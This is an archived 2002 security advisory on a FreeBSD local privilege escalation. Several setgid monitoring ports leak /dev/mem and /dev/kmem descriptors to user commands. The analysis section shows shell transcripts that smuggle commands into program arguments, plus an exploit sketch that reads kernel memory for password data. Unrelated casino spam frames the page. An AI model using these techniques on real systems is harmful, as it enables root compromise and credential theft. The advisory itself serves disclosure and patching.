Casinos Not On Gamstop Non Gamstop Casinos Casinos Not On Gamstop Online Casinos UK Non Gamstop Casino
17th Sep 2002 [SBWID-5696]
COMMAND
		libkvm permits priviledge escalation
SYSTEMS AFFECTED
		All software linked to libkvm prior to FreeBSD 4.6.2-RELEASE
PROBLEM
		From    an    issue    exclusively    disclosed    to    iDEFENSE     by
		[[email protected]]      [http://www.idefense.com/contributor.html],
		David Endler posted :
		The FreeBSD ports asmon, ascpu, bubblemon,  wmmon,  and  wmnet2  can  be
		locally manipulated to take advantage of open file descriptors  /dev/mem
		and /dev/kmem to gain root privileges  on  a  target  host.  These  five
		programs are installed setgid kmem  by  default.  They  will  drop  kmem
		privileges  before  executing   user   specified   commands   but   file
		descriptors to /dev/mem and /dev/kmem will remain open.  This  can  lead
		to a local root compromise in various ways (e.g. if an attacker  chooses
		to scan for the master password file in the Linux kernel memory).
		 ANALYSIS
		The latest versions of  all  five  above  mentioned  FreeBSD  ports  are
		vulnerable, the following examples illustrate the problems:
		
		bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep
		dummy|grep mem"
		dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
		dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem
		bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grep
		mem"
		dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
		dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem
		bash-2.05a$ cat .wmmonrc
		left "/home/dim/dummy"
		bash-2.05a$ wmmon &
		[1] 793
		bash-2.05a$ Monitoring 5 devices for activity.
		current stat is :1
		bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
		dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
		dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem
		bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep
		dummy|grep mem"
		wmnet: using kmem driver to monitor ec0
		dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
		dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem
		
		One possible exploit for these vulnerabilities is to replace getch()  in
		strings(1) with:
		
		int getch()
		{
		char buf[4];
		read(4,buf,1);
		return buf[0];
		}
		
		or a similar less CPU expensive function that  reads  a  character  from
		the /dev/mem file descriptor and execute the following:
		
		wmnet2 -e exploit|grep root|grep Charlie
		
SOLUTION
		Upgrade your vulnerable system to  4.6-STABLE;  or  to  the  RELENG_4_6,
		RELENG_4_5, or RELENG_4_4 security branch  dated  after  the  correction
		date (4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27).
		Alternatively  you  could  remove   the   setgid   bit   from   affected
		applications, however reducing the functionality:
		
		 chmod g-s /path.to/wmnet2
Internet highlights

Casino Not On Gamstop